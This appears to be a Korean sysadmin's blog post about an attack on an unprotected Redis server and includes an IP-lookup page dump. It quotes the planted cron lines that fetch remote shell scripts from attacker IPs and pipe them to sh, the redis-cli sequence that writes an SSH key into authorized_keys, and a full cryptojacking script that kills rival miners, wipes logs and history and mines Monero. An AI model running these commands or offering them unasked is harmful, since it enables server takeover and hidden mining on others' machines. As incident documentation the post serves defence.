레디스 해킹 시도 발견 Redis server crackit try attack detect

관리하고 있던 리눅스 서버를 점검중에 침입 시도를 발견하여 글로 남겨봅니다. 자세한 분석은 다음에..

Redis를 암호를 걸어두지 않고 원격접속을 허용하여 두었더니 침입 시도를 발견하였습니다.

검색해보니 이런 비슷한 방법인 듯 : http://blog.pages.kr/2198

http://antirez.com/news/96

https://www.v2ex.com/t/234520#reply25

발견한 사항

redis 서버에 새로운 key값 3개가 생성되어 있었음.

1. aaivwlczyp

*/1 * * * * /usr/bin/curl -fsSL http://64.140.174.129:8220/test9.sh | sh

2. uioottsohz

*/1 * * * * /usr/bin/curl -fsSL http://64.140.174.129:8220/test9.sh | sh

3. crackit

ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDE0guChoiGr6s3mXjQA0wX6YKNNMy2bpj6b8ArjuWH/mjN17bu275t/ZlSarmMC5hCVAx7eJEzqxqy43AiBS61UuFpWZXWal5b6XWdvrH6pCJOI5+ceeFMEmc64B7GNrs2OPyuaP0HST/xh0YyWwoE/2uZmc3EyiR8sIP7/11N+xhHH4nIZB/M8QDaBRN6DWUNd/kzLDuIHr4LntuhKEZpCuQIuiDm7ZBYzbYhGtpPWnO04FzbfMUqP1JssTd/G/mUflRgQhKVACyF8rd8o/o7Zy6I9JVgLV6FpNOLc5Ep9VJuFXxmcxWc+Bj//Sd4pgn4gbmb8GzAvlH2xxw+SV2h redis@redis.io

sh 쉘 스크립트 파일은 다운받아보려고 시도했으나 서버를 닫았는지 실패.

http 80 포트는 접근할 수 없었고, PING은 응답이 있다.

http://www.ip-tracker.org/locator/ip-lookup.php?ip=64.140.174.129

IP Locator

IP Lookup for: 64.140.174.129
IP Location: Ogden (Utah)

in United States

검색해보니 북미 솔트레이크 시티 근처로 IP가 확인.

중국쪽 공격인줄 알았는데 key값이 crackit인걸 보면 학생이거나 이쪽계통 사람이 해킹을 시도한 것으로 보임.

server에 등록된 user의 private key값을 탈취하는 것이 가능하다는 것을 확인.

핵심 명령어만 적어놓아 본다. target ip는 192.168.1.11

$ (echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > foo.txt

192.168.1.11:6379> config set dbfilename "backup.rdb"

192.168.1.11:6379> save

$ redis-cli -h 192.168.1.11 echo flushall

$ cat foo.txt | redis-cli -h 192.168.1.11 -x set crackit

192.168.1.11:6379> config set dir /Users/antirez/.ssh/

192.168.1.11:6379> config get dir

1) "dir"

2) "/Users/antirez/.ssh"

192.168.1.11:6379> config set dbfilename "authorized.keys"

192.168.1.11:6379> save

출처 : http://blog.pages.kr/2198

생각보다 간단한 것 같다.

이후에는 그냥 ssh tunnel 이용하여 접속하기로 결정했습니다.

cron job 처럼 생긴 sh 실행 구문은 어떻게 실행하려고 했는지 궁금하다.

누군가 알려주셨으면..

2017.08.27.

뭔가 또 당한 느낌인데 .sh 내용을 볼 수 있었다.

*/1 * * * * /usr/bin/curl -fsSL http://98.142.140.13:8220/test11.sh | sh

http://98.142.140.13:8220/test11.sh

#!/bin/bash 

(ps auxf|grep -v grep|grep minerd |awk '{print $2}'|xargs kill -9;crontab -r;pkill -9 minerd;pkill -9 i586;pkill -9 gddr;echo > /var/log/wtmp;history -c;cd ~;curl -L http://98.142.140.13:8220/minerd -o minerd;chmod +x minerd;setsid /root/minerd -B -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:3333 -u 41e2vPcVux9NNeTfWe8TLK2UWxCXJvNyCQtNb69YEexdNs711jEaDRXWbwaVe4vUMveKAzAiA4j8xgUi29TpKXpm3zKTUYo -p x &>>/dev/null)

모네로 마이닝을 돌리려는 심산인듯..

저번에 조회한 주소지랑 비슷하다

Advertisements IP Lookup Result From IP Locator on IP Map 지도 데이터 이용약관 지도 오류 신고 지도 위성 10 km	IP Locator & IP Lookup Basic Tracking Info IP Address: 98.142.140.13 [IP Blacklist Check] Reverse DNS: 13.140.142.98.in-addr.arpa Hostname: 98.142.140.13.16clouds.com Nameservers: ns1.16clouds.com >> 23.252.100.180 ns2.16clouds.com >> 192.243.124.142 Lookup IP Address Location For IP: 98.142.140.13 Continent: North America (NA) Country: United States    (US) Capital: Washington State: California City Location: Fremont Postal: 94539 Area: 510 Metro: 807 ISP: Cluster Logic Inc Organization: Cluster Logic Inc AS Number: AS25820 IT7 Networks Inc Time Zone: America/Los_Angeles Local Time: 00:49:09 Timezone GMT offset: -25200 Sunrise / Sunset: 06:34 / 19:43 Extra IP Lookup Finder Info for IP Address: 98.142.140.13 Continent Lat/Lon: 46.07305 / -100.546 Country Lat/Lon: 38 / -98 City Lat/Lon: (37.5497) / (-121.9621) IP Language: English IP Address Speed: Corporate Internet Speed [ Check Internet Speed] IP Currency: United States dollar($) (USD) IDD Code: +1